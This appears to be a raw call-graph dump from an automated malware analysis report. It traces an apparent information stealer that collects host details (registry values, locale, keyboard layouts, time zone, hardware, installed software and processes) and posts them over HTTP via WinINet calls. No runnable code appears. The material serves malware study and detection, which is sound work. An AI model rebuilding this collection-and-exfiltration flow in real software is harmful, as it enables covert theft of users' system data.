47a8a0 lstrcpy 14805->14806 14807 4649b2 14806->14807 14808 47a9b0 4 API calls 14807->14808 14809 4649d1 14808->14809 14810 47a8a0 lstrcpy 14809->14810 14811 4649da 14810->14811 14812 47a920 3 API calls 14811->14812 14813 4649f8 14812->14813 14814 47a8a0 lstrcpy 14813->14814 14816 464a01 14814->14816 14815->13837 14817 47a9b0 4 API calls 14816->14817 14818 464a20 14817->14818 14819 47a8a0 lstrcpy 14818->14819 14820 464a29 14819->14820 14821 47a9b0 4 API calls 14820->14821 14822 464a48 14821->14822 14823 47a8a0 lstrcpy 14822->14823 14824 464a51 14823->14824 14825 47a9b0 4 API calls 14824->14825 14826 464a7d 14825->14826 14827 47a920 3 API calls 14826->14827 14828 464a84 14827->14828 14829 47a8a0 lstrcpy 14828->14829 14830 464a8d 14829->14830 14831 464aa3 InternetConnectA 14830->14831 14831->14787 14832 464ad3 HttpOpenRequestA 14831->14832 14834 464ebe InternetCloseHandle 14832->14834 14835 464b28 14832->14835 14834->14787 14836 47a9b0 4 API calls 14835->14836 14837 464b3c 14836->14837 14838 47a8a0 lstrcpy 14837->14838 14839 464b45 14838->14839 14840 47a920 3 API calls 14839->14840 14841 464b63 14840->14841 14842 47a8a0 lstrcpy 14841->14842 14843 464b6c 14842->14843 14844 47a9b0 4 API calls 14843->14844 14845 464b8b 14844->14845 14846 47a8a0 lstrcpy 14845->14846 14847 464b94 14846->14847 14848 47a9b0 4 API calls 14847->14848 14849 464bb5 14848->14849 14850 47a8a0 lstrcpy 14849->14850 14851 464bbe 14850->14851 14852 47a9b0 4 API calls 14851->14852 14853 464bde 14852->14853 14854 47a8a0 lstrcpy 14853->14854 14855 464be7 14854->14855 14856 47a9b0 4 API calls 14855->14856 14857 464c06 14856->14857 14858 47a8a0 lstrcpy 14857->14858 14859 464c0f 14858->14859 14860 47a920 3 API calls 14859->14860 14861 464c2d 14860->14861 14862 47a8a0 lstrcpy 14861->14862 14863 464c36 14862->14863 14864 47a9b0 4 API calls 14863->14864 14865 464c55 14864->14865 14866 47a8a0 lstrcpy 14865->14866 14867 464c5e 14866->14867 14868 47a9b0 4 API calls 14867->14868 14869 464c7d 14868->14869 14870 47a8a0 lstrcpy 14869->14870 14871 464c86 14870->14871 14872 47a920 3 API calls 14871->14872 14873 464ca4 14872->14873 14874 47a8a0 lstrcpy 14873->14874 14875 464cad 14874->14875 14876 47a9b0 4 API calls 14875->14876 14877 464ccc 14876->14877 14878 47a8a0 lstrcpy 14877->14878 14879 464cd5 14878->14879 14880 47a9b0 4 API calls 14879->14880 14881 464cf6 14880->14881 14882 47a8a0 lstrcpy 14881->14882 14883 464cff 14882->14883 14884 47a9b0 4 API calls 14883->14884 14885 464d1f 14884->14885 14886 47a8a0 lstrcpy 14885->14886 14887 464d28 14886->14887 14888 47a9b0 4 API calls 14887->14888 14889 464d47 14888->14889 14890 47a8a0 lstrcpy 14889->14890 14891 464d50 14890->14891 14892 47a920 3 API calls 14891->14892 14893 464d6e 14892->14893 14894 47a8a0 lstrcpy 14893->14894 14895 464d77 14894->14895 14896 47a740 lstrcpy 14895->14896 14897 464d92 14896->14897 14898 47a920 3 API calls 14897->14898 14899 464db3 14898->14899 14900 47a920 3 API calls 14899->14900 14901 464dba 14900->14901 14902 47a8a0 lstrcpy 14901->14902 14903 464dc6 14902->14903 14904 464de7 lstrlen 14903->14904 14905 464dfa 14904->14905 14906 464e03 lstrlen 14905->14906 15845 47aad0 14906->15845 14908 464e13 HttpSendRequestA 14909 464e32 InternetReadFile 14908->14909 14910 464e67 InternetCloseHandle 14909->14910 14911 464e5e 14909->14911 14914 47a800 14910->14914 14911->14909 14911->14910 14913 47a9b0 4 API calls 14911->14913 14915 47a8a0 lstrcpy 14911->14915 14913->14911 14914->14834 14915->14911 15852 47aad0 14916->15852 14918 4717c4 StrCmpCA 14919 4717cf ExitProcess 14918->14919 14931 4717d7 14918->14931 14920 4719c2 14920->13839 14921 4718cf StrCmpCA 14921->14931 14922 4718ad StrCmpCA 14922->14931 14923 471913 StrCmpCA 14923->14931 14924 471932 StrCmpCA 14924->14931 14925 4718f1 StrCmpCA 14925->14931 14926 471951 StrCmpCA 14926->14931 14927 471970 StrCmpCA 14927->14931 14928 47187f StrCmpCA 14928->14931 14929 47185d StrCmpCA 14929->14931 14930 47a820 lstrlen lstrcpy 14930->14931 14931->14920 14931->14921 14931->14922 14931->14923 14931->14924 14931->14925 14931->14926 14931->14927 14931->14928 14931->14929 14931->14930 14933 47a7a0 lstrcpy 14932->14933 14934 465979 14933->14934 14935 4647b0 2 API calls 14934->14935 14936 465985 14935->14936 14937 47a740 lstrcpy 14936->14937 14938 4659ba 14937->14938 14939 47a740 lstrcpy 14938->14939 14940 4659c7 14939->14940 14941 47a740 lstrcpy 14940->14941 14942 4659d4 14941->14942 14943 47a740 lstrcpy 14942->14943 14944 4659e1 14943->14944 14945 47a740 lstrcpy 14944->14945 14946 4659ee InternetOpenA StrCmpCA 14945->14946 14947 465a1d 14946->14947 14948 465fc3 InternetCloseHandle 14947->14948 14949 478b60 3 API calls 14947->14949 14950 465fe0 14948->14950 14951 465a3c 14949->14951 14953 469ac0 4 API calls 14950->14953 14952 47a920 3 API calls 14951->14952 14954 465a4f 14952->14954 14955 465fe6 14953->14955 14956 47a8a0 lstrcpy 14954->14956 14957 47a820 2 API calls 14955->14957 14959 46601f codecvt 14955->14959 14961 465a58 14956->14961 14958 465ffd 14957->14958 14960 47a9b0 4 API calls 14958->14960 14963 47a7a0 lstrcpy 14959->14963 14962 466013 14960->14962 14965 47a9b0 4 API calls 14961->14965 14964 47a8a0 lstrcpy 14962->14964 14973 46604f 14963->14973 14964->14959 14966 465a82 14965->14966 14967 47a8a0 lstrcpy 14966->14967 14968 465a8b 14967->14968 14969 47a9b0 4 API calls 14968->14969 14970 465aaa 14969->14970 14971 47a8a0 lstrcpy 14970->14971 14972 465ab3 14971->14972 14974 47a920 3 API calls 14972->14974 14973->13845 14975 465ad1 14974->14975 14976 47a8a0 lstrcpy 14975->14976 14977 465ada 14976->14977 14978 47a9b0 4 API calls 14977->14978 14979 465af9 14978->14979 14980 47a8a0 lstrcpy 14979->14980 14981 465b02 14980->14981 14982 47a9b0 4 API calls 14981->14982 14983 465b21 14982->14983 14984 47a8a0 lstrcpy 14983->14984 14985 465b2a 14984->14985 14986 47a9b0 4 API calls 14985->14986 14987 465b56 14986->14987 14988 47a920 3 API calls 14987->14988 14989 465b5d 14988->14989 14990 47a8a0 lstrcpy 14989->14990 14991 465b66 14990->14991 14992 465b7c InternetConnectA 14991->14992 14992->14948 14993 465bac HttpOpenRequestA 14992->14993 14995 465fb6 InternetCloseHandle 14993->14995 14996 465c0b 14993->14996 14995->14948 14997 47a9b0 4 API calls 14996->14997 14998 465c1f 14997->14998 14999 47a8a0 lstrcpy 14998->14999 15000 465c28 14999->15000 15001 47a920 3 API calls 15000->15001 15002 465c46 15001->15002 15003 47a8a0 lstrcpy 15002->15003 15004 465c4f 15003->15004 15005 47a9b0 4 API calls 15004->15005 15006 465c6e 15005->15006 15007 47a8a0 lstrcpy 15006->15007 15008 465c77 15007->15008 15009 47a9b0 4 API calls 15008->15009 15010 465c98 15009->15010 15011 47a8a0 lstrcpy 15010->15011 15012 465ca1 15011->15012 15013 47a9b0 4 API calls 15012->15013 15014 465cc1 15013->15014 15015 47a8a0 lstrcpy 15014->15015 15016 465cca 15015->15016 15017 47a9b0 4 API calls 15016->15017 15018 465ce9 15017->15018 15019 47a8a0 lstrcpy 15018->15019 15020 465cf2 15019->15020 15021 47a920 3 API calls 15020->15021 15022 465d10 15021->15022 15023 47a8a0 lstrcpy 15022->15023 15024 465d19 15023->15024 15025 47a9b0 4 API calls 15024->15025 15026 465d38 15025->15026 15027 47a8a0 lstrcpy 15026->15027 15028 465d41 15027->15028 15029 47a9b0 4 API calls 15028->15029 15030 465d60 15029->15030 15031 47a8a0 lstrcpy 15030->15031 15032 465d69 15031->15032 15033 47a920 3 API calls 15032->15033 15034 465d87 15033->15034 15035 47a8a0 lstrcpy 15034->15035 15036 465d90 15035->15036 15037 47a9b0 4 API calls 15036->15037 15038 465daf 15037->15038 15039 47a8a0 lstrcpy 15038->15039 15040 465db8 15039->15040 15041 47a9b0 4 API calls 15040->15041 15042 465dd9 15041->15042 15043 47a8a0 lstrcpy 15042->15043 15044 465de2 15043->15044 15045 47a9b0 4 API calls 15044->15045 15046 465e02 15045->15046 15047 47a8a0 lstrcpy 15046->15047 15048 465e0b 15047->15048 15049 47a9b0 4 API calls 15048->15049 15050 465e2a 15049->15050 15051 47a8a0 lstrcpy 15050->15051 15052 465e33 15051->15052 15053 47a920 3 API calls 15052->15053 15054 465e54 15053->15054 15055 47a8a0 lstrcpy 15054->15055 15056 465e5d 15055->15056 15057 465e70 lstrlen 15056->15057 15853 47aad0 15057->15853 15059 465e81 lstrlen GetProcessHeap RtlAllocateHeap 15854 47aad0 15059->15854 15061 465eae lstrlen 15062 465ebe 15061->15062 15063 465ed7 lstrlen 15062->15063 15064 465ee7 15063->15064 15065 465ef0 lstrlen 15064->15065 15066 465f03 15065->15066 15067 465f1a lstrlen 15066->15067 15855 47aad0 15067->15855 15069 465f2a HttpSendRequestA 15070 465f35 InternetReadFile 15069->15070 15071 465f6a InternetCloseHandle 15070->15071 15075 465f61 15070->15075 15071->14995 15073 47a9b0 4 API calls 15073->15075 15074 47a8a0 lstrcpy 15074->15075 15075->15070 15075->15071 15075->15073 15075->15074 15078 471077 15076->15078 15077 471151 15077->13847 15078->15077 15079 47a820 lstrlen lstrcpy 15078->15079 15079->15078 15085 470db7 15080->15085 15081 470f17 15081->13855 15082 470e27 StrCmpCA 15082->15085 15083 470e67 StrCmpCA 15083->15085 15084 470ea4 StrCmpCA 15084->15085 15085->15081 15085->15082 15085->15083 15085->15084 15086 47a820 lstrlen lstrcpy 15085->15086 15086->15085 15088 470f67 15087->15088 15089 470fb2 StrCmpCA 15088->15089 15090 471044 15088->15090 15091 47a820 lstrlen lstrcpy 15088->15091 15089->15088 15090->13863 15091->15088 15093 47a740 lstrcpy 15092->15093 15094 471a26 15093->15094 15095 47a9b0 4 API calls 15094->15095 15096 471a37 15095->15096 15097 47a8a0 lstrcpy 15096->15097 15098 471a40 15097->15098 15099 47a9b0 4 API calls 15098->15099 15100 471a5b 15099->15100 15101 47a8a0 lstrcpy 15100->15101 15102 471a64 15101->15102 15103 47a9b0 4 API calls 15102->15103 15104 471a7d 15103->15104 15105 47a8a0 lstrcpy 15104->15105 15106 471a86 15105->15106 15107 47a9b0 4 API calls 15106->15107 15108 471aa1 15107->15108 15109 47a8a0 lstrcpy 15108->15109 15110 471aaa 15109->15110 15111 47a9b0 4 API calls 15110->15111 15112 471ac3 15111->15112 15113 47a8a0 lstrcpy 15112->15113 15114 471acc 15113->15114 15115 47a9b0 4 API calls 15114->15115 15116 471ae7 15115->15116 15117 47a8a0 lstrcpy 15116->15117 15118 471af0 15117->15118 15119 47a9b0 4 API calls 15118->15119 15120 471b09 15119->15120 15121 47a8a0 lstrcpy 15120->15121 15122 471b12 15121->15122 15123 47a9b0 4 API calls 15122->15123 15124 471b2d 15123->15124 15125 47a8a0 lstrcpy 15124->15125 15126 471b36 15125->15126 15127 47a9b0 4 API calls 15126->15127 15128 471b4f 15127->15128 15129 47a8a0 lstrcpy 15128->15129 15130 471b58 15129->15130 15131 47a9b0 4 API calls 15130->15131 15132 471b76 15131->15132 15133 47a8a0 lstrcpy 15132->15133 15134 471b7f 15133->15134 15135 477500 6 API calls 15134->15135 15136 471b96 15135->15136 15137 47a920 3 API calls 15136->15137 15138 471ba9 15137->15138 15139 47a8a0 lstrcpy 15138->15139 15140 471bb2 15139->15140 15141 47a9b0 4 API calls 15140->15141 15142 471bdc 15141->15142 15143 47a8a0 lstrcpy 15142->15143 15144 471be5 15143->15144 15145 47a9b0 4 API calls 15144->15145 15146 471c05 15145->15146 15147 47a8a0 lstrcpy 15146->15147 15148 471c0e 15147->15148 15856 477690 GetProcessHeap RtlAllocateHeap 15148->15856 15151 47a9b0 4 API calls 15152 471c2e 15151->15152 15153 47a8a0 lstrcpy 15152->15153 15154 471c37 15153->15154 15155 47a9b0 4 API calls 15154->15155 15156 471c56 15155->15156 15157 47a8a0 lstrcpy 15156->15157 15158 471c5f 15157->15158 15159 47a9b0 4 API calls 15158->15159 15160 471c80 15159->15160 15161 47a8a0 lstrcpy 15160->15161 15162 471c89 15161->15162 15863 4777c0 GetCurrentProcess IsWow64Process 15162->15863 15165 47a9b0 4 API calls 15166 471ca9 15165->15166 15167 47a8a0 lstrcpy 15166->15167 15168 471cb2 15167->15168 15169 47a9b0 4 API calls 15168->15169 15170 471cd1 15169->15170 15171 47a8a0 lstrcpy 15170->15171 15172 471cda 15171->15172 15173 47a9b0 4 API calls 15172->15173 15174 471cfb 15173->15174 15175 47a8a0 lstrcpy 15174->15175 15176 471d04 15175->15176 15177 477850 3 API calls 15176->15177 15178 471d14 15177->15178 15179 47a9b0 4 API calls 15178->15179 15180 471d24 15179->15180 15181 47a8a0 lstrcpy 15180->15181 15182 471d2d 15181->15182 15183 47a9b0 4 API calls 15182->15183 15184 471d4c 15183->15184 15185 47a8a0 lstrcpy 15184->15185 15186 471d55 15185->15186 15187 47a9b0 4 API calls 15186->15187 15188 471d75 15187->15188 15189 47a8a0 lstrcpy 15188->15189 15190 471d7e 15189->15190 15191 4778e0 3 API calls 15190->15191 15192 471d8e 15191->15192 15193 47a9b0 4 API calls 15192->15193 15194 471d9e 15193->15194 15195 47a8a0 lstrcpy 15194->15195 15196 471da7 15195->15196 15197 47a9b0 4 API calls 15196->15197 15198 471dc6 15197->15198 15199 47a8a0 lstrcpy 15198->15199 15200 471dcf 15199->15200 15201 47a9b0 4 API calls 15200->15201 15202 471df0 15201->15202 15203 47a8a0 lstrcpy 15202->15203 15204 471df9 15203->15204 15865 477980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15204->15865 15207 47a9b0 4 API calls 15208 471e19 15207->15208 15209 47a8a0 lstrcpy 15208->15209 15210 471e22 15209->15210 15211 47a9b0 4 API calls 15210->15211 15212 471e41 15211->15212 15213 47a8a0 lstrcpy 15212->15213 15214 471e4a 15213->15214 15215 47a9b0 4 API calls 15214->15215 15216 471e6b 15215->15216 15217 47a8a0 lstrcpy 15216->15217 15218 471e74 15217->15218 15867 477a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15218->15867 15221 47a9b0 4 API calls 15222 471e94 15221->15222 15223 47a8a0 lstrcpy 15222->15223 15224 471e9d 15223->15224 15225 47a9b0 4 API calls 15224->15225 15226 471ebc 15225->15226 15227 47a8a0 lstrcpy 15226->15227 15228 471ec5 15227->15228 15229 47a9b0 4 API calls 15228->15229 15230 471ee5 15229->15230 15231 47a8a0 lstrcpy 15230->15231 15232 471eee 15231->15232 15870 477b00 GetUserDefaultLocaleName 15232->15870 15235 47a9b0 4 API calls 15236 471f0e 15235->15236 15237 47a8a0 lstrcpy 15236->15237 15238 471f17 15237->15238 15239 47a9b0 4 API calls 15238->15239 15240 471f36 15239->15240 15241 47a8a0 lstrcpy 15240->15241 15242 471f3f 15241->15242 15243 47a9b0 4 API calls 15242->15243 15244 471f60 15243->15244 15245 47a8a0 lstrcpy 15244->15245 15246 471f69 15245->15246 15874 477b90 15246->15874 15248 471f80 15249 47a920 3 API calls 15248->15249 15250 471f93 15249->15250 15251 47a8a0 lstrcpy 15250->15251 15252 471f9c 15251->15252 15253 47a9b0 4 API calls 15252->15253 15254 471fc6 15253->15254 15255 47a8a0 lstrcpy 15254->15255 15256 471fcf 15255->15256 15257 47a9b0 4 API calls 15256->15257 15258 471fef 15257->15258 15259 47a8a0 lstrcpy 15258->15259 15260 471ff8 15259->15260 15886 477d80 GetSystemPowerStatus 15260->15886 15263 47a9b0 4 API calls 15264 472018 15263->15264 15265 47a8a0 lstrcpy 15264->15265 15266 472021 15265->15266 15267 47a9b0 4 API calls 15266->15267 15268 472040 15267->15268 15269 47a8a0 lstrcpy 15268->15269 15270 472049 15269->15270 15271 47a9b0 4 API calls 15270->15271 15272 47206a 15271->15272 15273 47a8a0 lstrcpy 15272->15273 15274 472073 15273->15274 15275 47207e GetCurrentProcessId 15274->15275 15888 479470 OpenProcess 15275->15888 15278 47a920 3 API calls 15279 4720a4 15278->15279 15280 47a8a0 lstrcpy 15279->15280 15281 4720ad 15280->15281 15282 47a9b0 4 API calls 15281->15282 15283 4720d7 15282->15283 15284 47a8a0 lstrcpy 15283->15284 15285 4720e0 15284->15285 15286 47a9b0 4 API calls 15285->15286 15287 472100 15286->15287 15288 47a8a0 lstrcpy 15287->15288 15289 472109 15288->15289 15893 477e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15289->15893 15292 47a9b0 4 API calls 15293 472129 15292->15293 15294 47a8a0 lstrcpy 15293->15294 15295 472132 15294->15295 15296 47a9b0 4 API calls 15295->15296 15297 472151 15296->15297 15298 47a8a0 lstrcpy 15297->15298 15299 47215a 15298->15299 15300 47a9b0 4 API calls 15299->15300 15301 47217b 15300->15301 15302 47a8a0 lstrcpy 15301->15302 15303 472184 15302->15303 15897 477f60 15303->15897 15306 47a9b0 4 API calls 15307 4721a4 15306->15307 15308 47a8a0 lstrcpy 15307->15308 15309 4721ad 15308->15309 15310 47a9b0 4 API calls 15309->15310 15311 4721cc 15310->15311 15312 47a8a0 lstrcpy 15311->15312 15313 4721d5 15312->15313 15314 47a9b0 4 API calls 15313->15314 15315 4721f6 15314->15315 15316 47a8a0 lstrcpy 15315->15316 15317 4721ff 15316->15317 15910 477ed0 GetSystemInfo wsprintfA 15317->15910 15320 47a9b0 4 API calls 15321 47221f 15320->15321 15322 47a8a0 lstrcpy 15321->15322 15323 472228 15322->15323 15324 47a9b0 4 API calls 15323->15324 15325 472247 15324->15325 15326 47a8a0 lstrcpy 15325->15326 15327 472250 15326->15327 15328 47a9b0 4 API calls 15327->15328 15329 472270 15328->15329 15330 47a8a0 lstrcpy 15329->15330 15331 472279 15330->15331 15912 478100 GetProcessHeap RtlAllocateHeap 15331->15912 15334 47a9b0 4 API calls 15335 472299 15334->15335 15336 47a8a0 lstrcpy 15335->15336 15337 4722a2 15336->15337 15338 47a9b0 4 API calls 15337->15338 15339 4722c1 15338->15339 15340 47a8a0 lstrcpy 15339->15340 15341 4722ca 15340->15341 15342 47a9b0 4 API calls 15341->15342 15343 4722eb 15342->15343 15344 47a8a0 lstrcpy 15343->15344 15345 4722f4 15344->15345 15918 4787c0 15345->15918 15348 47a920 3 API calls 15349 47231e 15348->15349 15350 47a8a0 lstrcpy 15349->15350 15351 472327 15350->15351 15352 47a9b0 4 API calls 15351->15352 15353 472351 15352->15353 15354 47a8a0 lstrcpy 15353->15354 15355 47235a 15354->15355 15356 47a9b0 4 API calls 15355->15356 15357 47237a 15356->15357 15358 47a8a0 lstrcpy 15357->15358 15359 472383 15358->15359 15360 47a9b0 4 API calls 15359->15360 15361 4723a2 15360->15361 15362 47a8a0 lstrcpy 15361->15362 15363 4723ab 15362->15363 15923 4781f0 15363->15923 15365 4723c2 15366 47a920 3 API calls 15365->15366 15367 4723d5 15366->15367 15368 47a8a0 lstrcpy 15367->15368 15369 4723de 15368->15369 15370 47a9b0 4 API calls 15369->15370 15371 47240a 15370->15371 15372 47a8a0 lstrcpy 15371->15372 15373 472413 15372->15373 15374 47a9b0 4 API calls 15373->15374 15375 472432 15374->15375 15376 47a8a0 lstrcpy 15375->15376 15377 47243b 15376->15377 15378 47a9b0 4 API calls 15377->15378 15379 47245c 15378->15379 15380 47a8a0 lstrcpy 15379->15380 15381 472465 15380->15381 15382 47a9b0 4 API calls 15381->15382 15383 472484 15382->15383 15384 47a8a0 lstrcpy 15383->15384 15385 47248d 15384->15385 15386 47a9b0 4 API calls 15385->15386 15387 4724ae 15386->15387 15388 47a8a0 lstrcpy 15387->15388 15389 4724b7 15388->15389 15931 478320 15389->15931 15391 4724d3 15392 47a920 3 API calls 15391->15392 15393 4724e6 15392->15393 15394 47a8a0 lstrcpy 15393->15394 15395 4724ef 15394->15395 15396 47a9b0 4 API calls 15395->15396 15397 472519 15396->15397 15398 47a8a0 lstrcpy 15397->15398 15399 472522 15398->15399 15400 47a9b0 4 API calls 15399->15400 15401 472543 15400->15401 15402 47a8a0 lstrcpy 15401->15402 15403 47254c 15402->15403 15404 478320 17 API calls 15403->15404 15405 472568 15404->15405 15406 47a920 3 API calls 15405->15406 15407 47257b 15406->15407 15408 47a8a0 lstrcpy 15407->15408 15409 472584 15408->15409 15410 47a9b0 4 API calls 15409->15410 15411 4725ae 15410->15411 15412 47a8a0 lstrcpy 15411->15412 15413 4725b7 15412->15413 15414 47a9b0 4 API calls 15413->15414 15415 4725d6 15414->15415 15416 47a8a0 lstrcpy 15415->15416 15417 4725df 15416->15417 15418 47a9b0 4 API calls 15417->15418 15419 472600 15418->15419 15420 47a8a0 lstrcpy 15419->15420 15421 472609 15420->15421 15967 478680 15421->15967 15423 472620 15424 47a920 3 API calls 15423->15424 15425 472633 15424->15425 15426 47a8a0 lstrcpy 15425->15426 15427 47263c 15426->15427 15428 47265a lstrlen 15427->15428 15429 47266a 15428->15429 15430 47a740 lstrcpy 15429->15430 15431 47267c 15430->15431 15432 461590 lstrcpy 15431->15432 15433 47268d 15432->15433 15977 475190 15433->15977 15435 472699 15435->13867 16165 47aad0 15436->16165 15438 465009 InternetOpenUrlA 15442 465021 15438->15442 15439 4650a0 InternetCloseHandle InternetCloseHandle 15441 4650ec 15439->15441 15440 46502a InternetReadFile 15440->15442 15441->13871 15442->15439 15442->15440 16166 4698d0 15443->16166 15445 470759 15446 47077d 15445->15446 15447 470a38 15445->15447 15450 470799 StrCmpCA 15446->15450 15448 461590 lstrcpy 15447->15448 15449 470a49 15448->15449 16342 470250 15449->16342 15452 4707a8 15450->15452 15477 470843 15450->15477 15453 47a7a0 lstrcpy 15452->15453 15455 4707c3 15453->15455 15454 470865 StrCmpCA 15456 470874 15454->15456 15495 47096b 15454->15495 15458 461590 lstrcpy 15455->15458 15459 47a740 lstrcpy 15456->15459 15460 47080c 15458->15460 15462 470881 15459->15462 15463 47a7a0 lstrcpy 15460->15463 15461 47099c StrCmpCA 15465 470a2d 15461->15465 15466 4709ab 15461->15466 15467 47a9b0 4 API calls 15462->15467 15464 470823 15463->15464 15468 47a7a0 lstrcpy 15464->15468 15465->13875 15469 461590 lstrcpy 15466->15469 15470 4708ac 15467->15470 15471 47083e 15468->15471 15472 4709f4 15469->15472 15473 47a920 3 API calls 15470->15473 16169 46fb00 15471->16169 15475 47a7a0 lstrcpy 15472->15475 15476 4708b3 15473->15476 15478 470a0d 15475->15478 15479 47a9b0 4 API calls 15476->15479 15477->15454 15481 47a7a0 lstrcpy 15478->15481 15480 4708ba 15479->15480 15482 47a8a0 lstrcpy 15480->15482 15483 470a28 15481->15483 15495->15461 15817 47a7a0 lstrcpy 15816->15817 15818 461683 15817->15818 15819 47a7a0 lstrcpy 15818->15819 15820 461695 15819->15820 15821 47a7a0 lstrcpy 15820->15821 15822 4616a7 15821->15822 15823 47a7a0 lstrcpy 15822->15823 15824 4615a3 15823->15824 15824->14698 15826 4647c6 15825->15826 15827 464838 lstrlen 15826->15827 15851 47aad0 15827->15851 15829 464848 InternetCrackUrlA 15830 464867 15829->15830 15830->14775 15832 47a740 lstrcpy 15831->15832 15833 478b74 15832->15833 15834 47a740 lstrcpy 15833->15834 15835 478b82 GetSystemTime 15834->15835 15836 478b99 15835->15836 15837 47a7a0 lstrcpy 15836->15837 15838 478bfc 15837->15838 15838->14790 15840 47a931 15839->15840 15841 47a988 15840->15841 15843 47a968 lstrcpy lstrcat 15840->15843 15842 47a7a0 lstrcpy 15841->15842 15844 47a994 15842->15844 15843->15841 15844->14793 15845->14908 15847 464eee 15846->15847 15848 469af9 LocalAlloc 15846->15848 15847->14796 15847->14799 15848->15847 15849 469b14 CryptStringToBinaryA 15848->15849 15849->15847 15850 469b39 LocalFree 15849->15850 15850->15847 15851->15829 15852->14918 15853->15059 15854->15061 15855->15069 15984 4777a0 15856->15984 15859 4776c6 RegOpenKeyExA 15861 4776e7 RegQueryValueExA 15859->15861 15862 477704 RegCloseKey 15859->15862 15860 471c1e 15860->15151 15861->15862 15862->15860 15864 471c99 15863->15864 15864->15165 15866 471e09 15865->15866 15866->15207 15868 471e84 15867->15868 15869 477a9a wsprintfA 15867->15869 15868->15221 15869->15868 15871 471efe 15870->15871 15872 477b4d 15870->15872 15871->15235 15991 478d20 LocalAlloc CharToOemW 15872->15991 15875 47a740 lstrcpy 15874->15875 15876 477bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15875->15876 15885 477c25 15876->15885 15877 477c46 GetLocaleInfoA 15877->15885 15878 477d18 15879 477d1e LocalFree 15878->15879 15880 477d28 15878->15880 15879->15880 15882 47a7a0 lstrcpy 15880->15882 15881 47a9b0 lstrcpy lstrlen lstrcpy lstrcat 15881->15885 15884 477d37 15882->15884 15883 47a8a0 lstrcpy 15883->15885 15884->15248 15885->15877 15885->15878 15885->15881 15885->15883 15887 472008 15886->15887 15887->15263 15889 4794b5 15888->15889 15890 479493 GetModuleFileNameExA CloseHandle 15888->15890 15891 47a740 lstrcpy 15889->15891 15890->15889 15892 472091 15891->15892 15892->15278 15894 472119 15893->15894 15895 477e68 RegQueryValueExA 15893->15895 15894->15292 15896 477e8e RegCloseKey 15895->15896 15896->15894 15898 477fb9 GetLogicalProcessorInformationEx 15897->15898 15899 477fd8 GetLastError 15898->15899 15904 478029 15898->15904 15907 477fe3 15899->15907 15908 478022 15899->15908 15902 4789f0 2 API calls 15906 47807b 15902->15906 15903 4789f0 2 API calls 15905 472194 15903->15905 15904->15902 15905->15306 15906->15908 15909 478084 wsprintfA 15906->15909 15907->15898 15907->15905 15992 4789f0 15907->15992 15995 478a10 GetProcessHeap RtlAllocateHeap 15907->15995 15908->15903 15908->15905 15909->15905 15911 47220f 15910->15911 15911->15320 15913 4789b0 15912->15913 15914 47814d GlobalMemoryStatusEx 15913->15914 15917 478163 __aulldiv 15914->15917 15915 47819b wsprintfA 15916 472289 15915->15916 15916->15334 15917->15915 15919 4787fb GetProcessHeap RtlAllocateHeap wsprintfA 15918->15919 15921 47a740 lstrcpy 15919->15921 15922 47230b 15921->15922 15922->15348 15924 47a740 lstrcpy 15923->15924 15930 478229 15924->15930 15925 478263 15926 47a7a0 lstrcpy 15925->15926 15928 4782dc 15926->15928 15927 47a9b0 lstrcpy lstrlen lstrcpy lstrcat 15927->15930 15928->15365 15929 47a8a0 lstrcpy 15929->15930 15930->15925 15930->15927 15930->15929 15932 47a740 lstrcpy 15931->15932 15933 47835c RegOpenKeyExA 15932->15933 15934 4783d0 15933->15934 15935 4783ae 15933->15935 15937 478613 RegCloseKey 15934->15937 15938 4783f8 RegEnumKeyExA 15934->15938 15936 47a7a0 lstrcpy 15935->15936 15947 4783bd 15936->15947 15941 47a7a0 lstrcpy 15937->15941 15939 47843f wsprintfA RegOpenKeyExA 15938->15939 15940 47860e 15938->15940 15942 478485 RegCloseKey RegCloseKey 15939->15942 15943 4784c1 RegQueryValueExA 15939->15943 15940->15937 15941->15947 15944 47a7a0 lstrcpy 15942->15944 15945 478601 RegCloseKey 15943->15945 15946 4784fa lstrlen 15943->15946 15944->15947 15945->15940 15946->15945 15948 478510 15946->15948 15947->15391 15949 47a9b0 4 API calls 15948->15949 15950 478527 15949->15950 15951 47a8a0 lstrcpy 15950->15951 15952 478533 15951->15952 15953 47a9b0 4 API calls 15952->15953 15954 478557 15953->15954 15955 47a8a0 lstrcpy 15954->15955 15956 478563 15955->15956 15957 47856e RegQueryValueExA 15956->15957 15957->15945 15958 4785a3 15957->15958 15959 47a9b0 4 API calls 15958->15959 15960 4785ba 15959->15960 15961 47a8a0 lstrcpy 15960->15961 15962 4785c6 15961->15962 15963 47a9b0 4 API calls 15962->15963 15964 4785ea 15963->15964 15965 47a8a0 lstrcpy 15964->15965 15966 4785f6 15965->15966 15966->15945 15968 47a740 lstrcpy 15967->15968 15969 4786bc CreateToolhelp32Snapshot Process32First 15968->15969 15970 47875d CloseHandle 15969->15970 15971 4786e8 Process32Next 15969->15971 15972 47a7a0 lstrcpy 15970->15972 15971->15970 15976 4786fd 15971->15976 15974 478776 15972->15974 15973 47a9b0 lstrcpy lstrlen lstrcpy lstrcat 15973->15976 15974->15423 15975 47a8a0 lstrcpy 15975->15976 15976->15971 15976->15973 15976->15975 15978 47a7a0 lstrcpy 15977->15978 15979 4751b5 15978->15979 15980 461590 lstrcpy 15979->15980 15981 4751c6 15980->15981 15996 465100 15981->15996 15983 4751cf 15983->15435 15987 477720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15984->15987 15986 4776b9 15986->15859 15986->15860 15988 477765 RegQueryValueExA 15987->15988 15989 477780 RegCloseKey 15987->15989 15988->15989 15990 477793 15989->15990 15990->15986 15991->15871 15993 478a0c 15992->15993 15994 4789f9 GetProcessHeap HeapFree 15992->15994 15993->15907 15994->15993 15995->15907 15997 47a7a0 lstrcpy 15996->15997 15998 465119 15997->15998 15999 4647b0 2 API calls 15998->15999 16000 465125 15999->16000 16156 478ea0 16000->16156 16002 465184 16003 465192 lstrlen 16002->16003 16004 4651a5 16003->16004 16005 478ea0 4 API calls 16004->16005 16006 4651b6 16005->16006 16007 47a740 lstrcpy 16006->16007 16008 4651c9 16007->16008 16009 47a740 lstrcpy 16008->16009 16010 4651d6 16009->16010 16011 47a740 lstrcpy 16010->16011 16012 4651e3 16011->16012 16013 47a740 lstrcpy 16012->16013 16014 4651f0 16013->16014 16015 47a740 lstrcpy 16014->16015 16016 4651fd InternetOpenA 